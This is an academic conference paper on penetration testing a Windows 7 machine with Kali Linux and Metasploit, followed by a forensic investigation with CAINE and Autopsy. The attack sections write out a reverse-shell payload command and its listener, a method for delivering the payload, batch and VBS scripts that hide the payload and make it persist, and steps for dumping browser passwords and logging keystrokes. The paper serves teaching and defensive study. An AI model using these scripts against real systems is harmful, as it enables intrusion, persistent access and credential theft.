Conducting and Identifying Penetration Attacks Using Linux Based Systems 
Aparicio Carranza 
Computer Engineering Technology 
New York City College of Technology – CUNY 
Brooklyn, NY, USA 
Email: acarranza@citytech.cuny.edu 
German Calle, Gin Pena, Jose Camacho, Harrison 
Carranza, Yeraldina Estrella 
Computer Engineering Technology 
New York City College of Technology – CUNY 
Brooklyn, NY, USA 
 
Abstract— Nowadays, it will be hard to say that something like 
digital security actually exists. It is becoming more common to 
hear 
news 
about 
businesses 
being 
hacked, 
sensitive 
information such as credit card information being stolen, and 
attacks done by Denial of Service (DoS). Penetration testing, 
also known as Pentesting, involves breaking into systems to 
find vulnerabilities for the purposes of reinforcing the system’s 
security. However, in the case that the system has been 
invaded, closer observation of the attack might be done by 
using computer forensics tools that attempts to track the 
damage on the compromised system. Penetration testing can be 
done by using Metasploit, an integral tool found in Kali Linux. 
Meanwhile, Computer Forensics can be done by using Autopsy 
and Guymager, these tools are integrated in Computer Aided 
Investigative Environment (CAINE). With the combination of 
the two components, system security and recovery gets 
improved. This research paper will focus on utilizing these 
tools to penetrate the system followed by a close examination of 
the system’s damage. 
Keywords — Kali Linux, CAINE, Pentesting, Computer 
Forensics, Metasploit 
I. 
INTRODUCTION 
The current state of the Internet shows that anything put 
onto the internet is unsafe. For a long time, hackers have 
found ways around security measures taken by companies to 
protect their content through firewalls, anti-viruses and 
encryption. A group that goes by the name Lulzsec was able 
to penetrate PBS and Sony, and stole sensitive information. 
The group was reportedly able to steal information of about 
24.6 million customers from Sony [1]. This activity proves 
that nothing is safe in today’s interconnected world. 
However, system vulnerabilities can be found and the extent 
of an attack can be identified given the proper tools and 
knowledge.  
Penetration testing lifecycles have been developed to 
guide and produce well-documented results that could easily 
be understood, edited and/or replicated. The framework is 
comprised of Reconnaissance, Scanning, Exploitation, 
Maintaining Access, and Reporting [2]. Kali Linux is an 
especial distribution of the Linux OS, practically available to 
anyone; such tools will enable the user to perform 
penetration activities to client and server computing systems 
through the usage of exploitations [9]. Tools, such as 
Metasploit gather exploits available to be used specifically 
on Windows users. These resources have been implemented 
over the years by the computer security community [2]. 
Many of these exploits require most of the work to be done 
by the user’s end where they download and install malicious 
software (malware) into their computer without even 
knowing it. Once the malware is running, Kali Linux has 
complete access to the Windows terminal of the victim.  
While Kali Linux focuses on penetration testing,  
Computer Aided INvestigative Environment (CAINE) is  an 
open source computer forensic tool that focuses on detecting 
and analyzing system attacks [4]. There are different 
investigation types for computer forensics. The attack 
performed by Kali Linux requires CAINE to conduct an 
investigation, which is referred to as an external breach [11]. 
This is where attackers from outside the network target the 
resources in order to obtain private data for testing purposes 
and wrongful gain. 
In computer forensics investigation, there are two basic 
types of data that are collected from the system. The first is 
the data that is stored on a local hard drive or another storage 
device, which is preserved and still intact when the computer 
is being shut down. The second one is volatile data. This is 
data that is stored in memory, or exists in transit, that will be 
lost when the computer loses power or being shut down. 
Volatile data resides in registers, cache, and RAM. Since 
volatile data is ephemeral, it is essential that an investigator 
knows reliable ways to capture them [5]. 
Autopsy is a tool used to recover images and data. This 
tool is a graphical interface to the command line digital 
investigation analysis tools in The Sleuth Kit. This tool can 
be run from the command line and also has integrated tools 
that simplify the search to find the corrupted files. Autopsy 
provides two modes for analyzing the compromised data. 
The first is the Dead Analysis, this occurs when a dedicated 
analysis system is used to examine the data from a suspected 
system. Here, Autopsy and The Sleuth Kit are run in a 
trusted environment. The second is live analysis, this occurs 
when the suspected system is being analyzed while it is 
running. This is frequently used during incident response 
while the incident is being confirmed. After it is confirmed 
and secured, the system can be acquired and a dead analysis 
can be completed [3]. 
Guymager is a forensic imaging tool, which allows the 
user to create an image of the hard disk for further analysis. 
Guymager is one of the forensic imaging tools that utilizes 
mutli-threading for imaging processing. As a result, this 
provides fast processing when obtaining an image. In 
addition, the image can be created as a split image or a whole 
image. This tool also provides various image formats to 
extract the hard disk image [8]. 
27
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

A collection of the mentioned tools are as helpful as they 
are dangerous. Repercussions for actions like these can 
easily be a penalty of 20 years or more at a federal prison [2]. 
For this reason, our research will be conducted under 
controlled conditions in terms of networking. The 
presentation of the results of this research must meet the 
legal requirements. In the following section, we present the 
penetration testing component with the Kali Linux 
implementation, we detail the metasploit analysis in Section 
III, in Section IV we step through the forensics analysis 
component of our work with the CAINE implementation and 
particularize our work with autopsy analysis in Section V; 
and finally in Section VI our conclusion is presented.  
II. KALI LINUX IMPLEMENTATION 
The activities for performing our penetration testing 
consisted of two parts. The first part of our approach was to 
enact a virtual attack. In this section, the main focus is to use 
Kali Linux to attack Windows 7 in a virtual machine lab 
environment as recommended as to isolate the testing 
environment and evade any law violations. In the second 
part, the attack was taken from a virtual machine, to an 
actual client system in a network provided by the team 
members under controlled conditions. 
Kali Linux and Windows 7 were setup to work under the 
same network through the network settings of VMware 
Workstation. Once the operating systems were installed, the 
next approach was to introduce Metasploit to the equation. 
Metasploit is a tool used in Kali Linux to gain access to the 
victim’s terminal (Windows 7 command terminal) [2, 10]. 
This was done by first generating the payload (the virus) by 
using the msfpayload command. In its entirety, the command 
would be written as follows: 
 
msfpayload windows/meterpreter/reverse_tcp LHOST =  
XXX.XXX.X.XX LPORT = 4444 > esktop/attackfile.exe (the X’s 
represent the attacker’s IP address) 
 
Meterpreter is a payload that uses reverse_tcp to attack 
Windows 7 through a reverse shell. If the victim opens this 
backdoor generated malware, a connection will be 
established between the victim and the attacker giving the 
attacker to access to the Windows 7 command terminal [2]. 
The LHOST represents the current IP address of the attacker 
and LPORT represents the port number that the attacker will 
access in order to connect. Finally the location of the file is 
specified in the command as well as a name for the payload 
and its extension. The payload runs in the background and is 
observed through the task manager as a running process - 
therefore a proper name and extension should be given that 
will not arise suspicion. It is extremely important to note that 
the payload was generated with the current IP address that 
the attacker is using. If the IP address were to change, then 
the payload must be regenerated with the new IP address. 
Another thing is that this payload is one of many payloads 
that are available, but meterpreter was the most convenient to 
use. Once this is done, the next step is to start Metasploit by 
using the command msfconsole. The terminal interface 
should appear as shown in Figure 1. 
 
 
Figure 1 – Metasploit Framework 
 
In Metasploit, the first thing to do is to specify the exploit 
that will be used to deliver the payload. This exploit is called 
multi/handler, which is also known as the exploit-less 
handler. Normally when a payload is sent, it must be 
packaged and sent with the exploit. However with handler, 
you wait for a connection back from the victim. This is done 
by using the commands on the msf: 
• 
use multi/hander 
• 
set LHOST XXX.XXX.X.XX 
• 
set LPORT 4444 
• 
set payload windows/meterpreter/reverse_tcp 
• 
exploit 
 
The type of exploit is set as multi/handler, the IP address 
of the attacker is specified, the port number is 4444 by 
default, and the payload is set to the payload generated 
previously. Once this is done, use the command: exploit. It 
should be noted that the exploit is a Metasploit listener, 
which is capable of answering these kinds of client-side 
attacks. This means that it will call home for further 
instructions, to which the multi-handler will take care of 
responding. Metasploit will be waiting, as shown below: 
 
[*] Started reverse handler on 192.168.1.33:4444 
[*] Starting the payload handler … 
 
Once the call is answered, the victim’s command line can 
be accessed for full navigation [2]. The next step was to send 
the victim the payload, which can be conveniently done 
through a new terminal window. This is done by setting up 
an Apache web server named apache2, which can then be 
accessed by the victim via browser using the attacker’s IP 
address followed by the name of the folder [2]. The 
following commands should be entered to setup a folder 
specifically for apache2: 
 
mkdir /var/www/share (directory to store the payloads) 
cd var/www 
chmod -R 755 /var/www/share/ 
chown -R www-dataLwww-data /var/www/share/ 
ls -la /var/www/ | grep share 
service apache2 start 
 
28
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

Everything prior to the final command will create folders 
that can then be accessed when apache2 is running by the 
attacker. In addition, the generated payloads that are going 
to 
be 
used 
must 
be 
dropped 
inside 
the 
folder 
/var/www/share. Once the final command is entered, the 
victim can open up a web browser and can type: 
 
XXX.XXX.XX.X/var/www/share  (X’s represent the IP address) 
 
The victim can then download the payload and run it. This 
is referred to as malware attack type, which is part of the 
code injection attack vectors [2]. In Figure 2, the listener has 
successfully connected with the victim’s computer.  
 
 
 
Figure 2 – Console Changed to Meterpreter Exploit 
 
meterpreter>  
[*] 192.168.1.26 – Meterpreter session 1 closed. Reason died 
 
The payload termination is shown above. If the victim 
were to close the payload from the task manager or shut off 
the computer, the payload will not run itself again and will 
terminate all connections. 
 
 
 
Figure 3 – Entering Windows Terminal 
 
Once in the meterpreter console, by entering the 
command shell, the console is moved to the Windows 
terminal as shown in Figure 3. 
One thing to note is that in order to run the payload, 
permission is requested from the user every single time. 
This is because the payload is a file that is not native to 
Windows or the computer. In order to bypass this, an 
application that was created by Microsoft for download 
called Streams.exe can be used to remove the ID stream 
therefore removing the permission prompt. This must be 
done through a Windows OS, and then passed on to the 
victim through the apache web server. In the Windows 
command enter:  
 streams.exe –d attackfile.exe 
 
The physical attack is the next phase towards successfully 
penetrating a system. Autorun was a feature used where 
through an .ini file, USB, CD, and external hard drives can 
run any file automatically once the USB is plugged in. For 
attackers, this is considered a local exploit method as 
opposed to the remote exploit that is used with the Apache 
Server [2]. However, since this method is no longer 
available for vulnerability reasons, a manual run execution 
has to be performed but the process could still be automated 
through the shellcode using batch files. 
The batch script shown below, will copy the contents of 
the USB to the designated locations. To ensure that the 
correct drive is used, an if statement is used to find 
startupfile.bat in the correct drive. 
 
if EXIST A:\startupfile.bat ( 
copy A:\startupfile.bat 
C:/Users\%Username%\Appdata\Roaming\Microsoft\Windows\"Start 
Menu"\Programs\Startup 
copy A:\attackfile.exe 
C:/Users\%Username%\Appdata\Roaming\Microsoft\Windows\"Start 
Menu"\Programs\Startup 
copy A:\invisScript.bat 
C:/Users\%Username%\Appdata\Roaming\Microsoft\Windows\"Start 
Menu"\Programs 
copy A:\invis.vbs 
C:/Users\%Username%\Appdata\Roaming\Microsoft\Windows\"Start 
Menu"\Programs 
C: 
cd "Users\%Username%\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup" 
startupfile.bat 
) 
A prime location is the startup folder for the payload and 
startupfile.bat file. Startup folders will run any applications 
upon reaching the desktop. 
 
@echo off 
cd \ 
:Start 
cd \ 
cd "Users\%username%\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup" 
attackfile.exe 
cd \ 
cd "Users\%username%\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs" 
invisScript.bat 
goto Start 
 
Startupfile.bat shown above, is an script that will run 
attackfile.exe over and over again until the attacker is 
listening through Kali Linux. This will guarantee that the 
attacker has access to the victim’s computer every single 
time it is turned on. Two more files must be copied over 
elsewhere (anywhere) as long as it is not the startup folder. 
However, noting their location is important as they have to 
be referenced on the scripts. Startupfile.bat will run the 
second file invisScript.bat, as shown below. The VBS file 
will hide the command prompt from the user and run in the 
background as the malware needs a running command 
prompt to stay active. 
 
Set WshShell = CreateObject("Wscript.Shell") 
WshShell.Run chr(34) & 
"C:\Users\Alex\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\startupfile.bat" & Chr(34), 0 
Set WshShell = Nothing 
29
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

 
wscript.exe invis.vbs run.bat % 
 
Once transferfiles.bat is opened, everything else is taken 
care of. The USB can then be removed. The attacker may 
then use the exploit command in Metasploit to gain access 
to the victim’s Windows terminal. The Metasploit 
framework should now display meterpreter on the console 
instead of msf. 
III. METASPLOIT ANALYSIS 
There are countless of things that we can do in 
meterpreter such as key loggers or turning on the webcam 
service, etc. [9].  However, one of the main features of this 
terminal is the fact that the attacker’s files become aligned 
with the victim’s files. Therefore, the attacker can change to 
different folders as well as the victim’s, and then download 
or upload files in the respective directory. This option allows 
the attacker to send and receive files. To change directories 
in Windows, the cd command is used followed by the path. 
The command pwd can be used to see the current path 
directory. To change directories in Kali Linux, lcd is used 
and lpwd is used to check the current directory path. Once 
the folders are aligned, the upload command can be used to 
send a file from Kali Linux to Windows. On the other hand, 
the download command can be used to extract a file from 
Windows to Kali Linux. 
Lastly, the command shell can be used. This command 
will send the attacker straight to the victim’s terminal 
allowing any commands that does not require administrative 
rights. 
A. Browser Password Dump 
Web Browsers always store data, specifically passwords 
to accounts such as email or even shopping websites such as 
Amazon. Notice how the web browser always asks if the 
user would like to save their password for the next time they 
visit the site. If saved, this password is stored into cookies 
and put away in a folder. This may seem harmless but in 
actuality leaves the user exposed if they were hacked. The 
Browser Password Dump is a Windows terminal tool used in 
Windows that will grab those cookies, decode them, and 
display the login, password, and the website of the account. 
This tool can be transferred through meterpreter and must 
run through the Windows terminal. 
 
 
 
Figure 4 – Uploading Password Dump to Windows 
 
 
 
Figure 5 – Password Dump 
 
In Figure 4, the directories of Kali Linux and Windows 
are aligned. From there the Browser Password dumper is 
uploaded to the Windows desktop.  The command shell was 
used to enter the Windows terminal and then run the 
software by entering BrowserPasswordDump.exe. The 
terminal program will dump all logins and passwords 
including the web browser used, as shown in Figure 5. 
B. Keylogger 
Keystrokes can be logged through Metasploit. This tool 
is very useful although this process is slow and dependent on 
the victim to the do work, it does not leave any footprints. 
This makes it harder for someone to track this event if they 
are using computer forensics to perform investigation. By 
using the keyscan_start command, Metasploit will begin 
grabbing all keystrokes done by the victim. When this data 
needs to be collected, the command keyscan_dump is used to 
be displayed in the terminal as shown in Figure 6. To ensure 
that the keylogger does not lose any connection while it logs 
the keystrokes, the meterpreter can be migrated to a process 
in Windows such as explorer.exe. This process cannot be 
closed, which will make sure that the keylogger is running. 
To get a list of the processes, the ps command can be used. 
To migrate to the process, the migrate # command must be 
used. The # should be the ID of the process. 
 
 
 
Figure 6 – Keylogger Dump 
IV. CAINE IMPLEMENTATION 
In order to create a disk image using Guymager [8], first 
mount the secondary disk or the destination disk as writeable 
by using the mounter on the desktop. Mount the disk where 
30
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

the image will be obtained from as read only, as shown in 
Figure 7 and Figure 8.  
 
 
 
Figure 7 –Writable Option from the Mounter 
 
 
 
Figure 8 – Read Only Option from the Mounter 
 
Afterwards, open Guymager from the forensic tool listed 
in CAINE. As seen in Figure 9, Guymager opens and 
displays a list of mounted disks. Right click and acquire the 
image of the source. Moreover, fill in the fields with the 
corresponding information of the investigation and select the 
destination where the image will be written to, as shown in 
Figure 10. 
 
 
 
Figure 9 – List to Acquire Image 
 
 
 
Figure 10 – Naming and Selecting Image Destination 
 
In Figure 11, a new case is opened using the Autopsy 
Forensic Browser. It can be accessed from the forensic tools 
on the menu or by typing “http://localhost:9999/autopsy”. 
There, a case name, a description, and investigator names can 
be entered into the fields, as is seen in Figure 12.  
 
 
 
Figure 11 – Autopsy Forensic Browser 
 
 
 
Figure 12 - Case Creation 
 
31
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

Afterwards, a host must be added, which is just the name 
of the computer being analyzed along with a description of 
the system, as shown in Figure 13 and Figure 14. 
 
 
 
Figure 13 – Case directory location 
 
 
 
Figure 14 – Adding Host 
 
The next step is to add the image file to the case as a 
partition type with the symlink import method as shown in 
Figure 15 and Figure 16.  
 
 
 
Figure 15 – Host Directory Location 
 
 
 
Figure 16 – Adding Image 
In the next window, the option to calculate the MD5 hash 
value for the image is selected and then the image is added. 
This is not exactly required for Autopsy itself, but the hash 
information can be useful when using other tools. In this 
window, autopsy recognizes the file system type and mount 
point, as it is shown in Figure 17. 
 
 
 
Figure 17 – Image and File system details 
 
 
 
Figure 18 – Case gallery and analysis selection 
 
Afterwards, the image can be analyzed through file 
analysis or keyword search. Also, everything can be sorted by 
file type. File analysis displays the hard drive in directory 
form and can be thoroughly browsed as it was on the local 
machine, as is shown in Figure 18. The files that appear will 
be color coded, as is seen in Figure 19. Any files in blue color 
indicate that the file still exists in its entirety on the drive. Red 
colored files indicate that a file has been erased from the hard 
disk. Finally, burgundy colored files indicate that a file has 
been reallocated to a different part of the hard drive recently. 
The directories can be sorted by chronological order, when 
they were accessed last, changed, created, or by the size of the 
file [6].  
 
32
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

 
 
Figure 19 – File Analysis 
 
 
 
Figure 20 – Timeline Creation 
 
When attempted to do any data recovery, there is an 
option that sorts all deleted files into one list for convenience. 
Files indicated as deleted that are underlined are files that still 
have data on the hard drive. However, this does not mean that 
the file is there in its entirety. When clicked, Autopsy will 
attempt to recognize the file type and its data. Only if the file 
is complete it will succeed.  For example, images or text files 
can be previewed completely on the bottom half of the 
browser. It does not need to be exported before being seen, 
removing the possibility of downloading harmful files into the 
hard drive. 
A file activity time line can also be created, which will 
detail the activity of the system. As shown in Figure 20; first 
the create data file option is clicked and select the desired 
image. It is send to an output file with the name body. Next, 
the input file that was created is selected as an input and 
starting and ending dates can be specified if desired. The 
results can be saved in a text file under any name and can be 
viewed in Autopsy or in a text editor. This will sort the 
activity by date and time, in which they were happening. Note 
that the file will display all activity happening on the 
machine, which can make it really hard to pin point the 
attacks unless what is being found is specific. 
V. AUTOPSY ANALYSIS 
To identify the attack, a file Activity timeline was created 
targeting the last two months for observation, Though the 
timeframe did not have to be to this large since the date of 
attack was already known, it was done to simulate and 
observe a real situation where the attack would be unknown 
and analysis would have had to be done in different time 
ranges to narrow and determine the attack.  
Observation of programs that have been run and instances 
of deletions of personal files are flags that can help 
determine the possibility of the attack day. Running the 
program PasswordBrowserDump.exe gives information of a 
possible day of attack. Investigating the activity for these 
days, observations of file deletions and creation of other files 
in different locations of the hard drive can be obtained. 
Taking note of the locations is important as they can be 
investigated during the file analysis phase, where we can 
observe more suspicious activity of file creations on startup 
folder as shown in Figure 21.  
 
 
 
Figure 21 – Suspicious Locations of File Creations 
 
 
 
Figure 22 – Directories Organized by Creation Date 
 
Through the file analysis tab, the disk image can be 
browsed as desired. In Figure 22, the files are all color coded 
33
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

with blue for current files in disk, red for deleted files and 
burgundy for reallocated files. Moving along the directories, 
files can be selected to attempt recovery if necessary. 
Though there is an option to display all deleted files, they 
can only be sorted by alphabetical order and include 
temporary files from programs, which displays a rather large 
pool of files, making it hard to target the desired files, as 
shown in Figure 23 [7].   
VI. CONCLUSION 
Using Kali Linux, a penetration attack was done with the 
help of the Metasploit Framework. Through a physical 
attack, a virus was installed and damage was done to the 
computer in terms of deleting files, running a keylogger, and 
grabbing passwords though a terminal utility. However, there 
were limitations in using this method. It takes a little bit of 
time to use the USB since the removal of Autorun. The virus 
must be manually installed and even before that, the USB 
must be installed if it was inserted for the first time on the 
computer. The virus itself can currently only bypass the 
firewall but not an antivirus. These payloads have already 
been discovered by antiviruses and are immediately 
recognized. Nevertheless, the attack performed was still 
successful. 
 
 
In order to identify the attack, a hard drive image of the 
attacked system must be obtained to be carefully analyzed. 
The disk image must be that of a hard drive with an 
operating system installed, otherwise the image will be 
recognized as a raw format rather than a NTFS of FAT file 
system, which is required for full analysis. The guymanger 
tool included on CAINE was utilized to create the image of 
the hard disk. With the help of the Autopsy File Browser, 
image directory navigation could be accomplished as if it 
was done directly on the victim’s system. By creating a time 
line, it was possible to observe all activities performed on the 
hard drive at specific dates and time. This was useful in 
narrowing down the list of activities to increase the chances 
of finding the attack. Finding suspicious activities on certain 
days merited closer observation, which allowed for 
recognition of the attack and analysis of the damage.     
 
Figure 23 – All Deleted Files List 
 
REFERENCES 
Browsing to the locations noted during the timeline 
analysis, the files can be accessed and analyzed without the 
need to import them. The Batch files can be read and exe 
files observed right from the browser as shown in Fig. 24.  
[1] 
Ch. Arthur "LulzSec: What They Did, Who They Were and How 
They Were Caught" The 
guardian, www.theguardian.com/technology/2013/may/16/lulzsec-
hacking-fbi-jail (accessed 16 May 2013) 
 
[2] 
J. Broad, and A. Bindner. "Hacking with Kali: Practical Penetration 
Testing Techniques", Syngress, 2015.  
 
[3] 
B. Carrier "Brian’s Papers and Books”. www.digital-
evidence.org/papers/ (accessed 05 May 2015) 
[4] 
"CAINE Computer Forensics Linux Live Distro” www.caine-live.net 
(accessed 05 May 2015) 
[5] 
J. Vacca "Computer Forensics: Computer Crime Scene 
Investigation". Charles River Media, 2008. 
[6] 
"Digital Forensics Tutorials – Analyzing a Disk Image in Kali 
Autopsy” http://nest.unm.edu/files/8813/9252/1107/Tutorial_6_-
Kali_Linux_-_Sleuthkit.pdf (accessed 06 May 2015) 
[7] 
O. Hansen "System Forensics, Investigations and Response", SANS 
Institute, 26 Jan, 2005, www.giac.org/paper/gcfa/160/analysis-fat16-
formatted-image-linux-tsk-autopsy/106874 (accessed 12 May 2015) 
[8] 
”Guymager Homepage”, http://guymager.sourceforge.net (accessed 7 
May 2015) 
[9] 
“Metasploit Unleashed”, https://www.offensive-
security.com/metsploit-unleashed/ (accessed 05 May 2015) 
[10] "Our Most Advanced Penetration Testing Distribution, Ever.", Kali 
Linux, https://www.kali.org (accessed 05 May 2015) 
 
[11] A.Philipp, D. Cowen, and C. Davis “Hacking Exposed Computer 
Forensics”, 2nd Ed. McGraw-Hill/Osborne, 2010. 
Figure 24 – Batch File View on the Autopsy Browser 
 
 
. 
34
Copyright (c) IARIA, 2015.     ISBN:  978-1-61208-439-8
ICSNC 2015 : The Tenth International Conference on Systems and Networks Communications

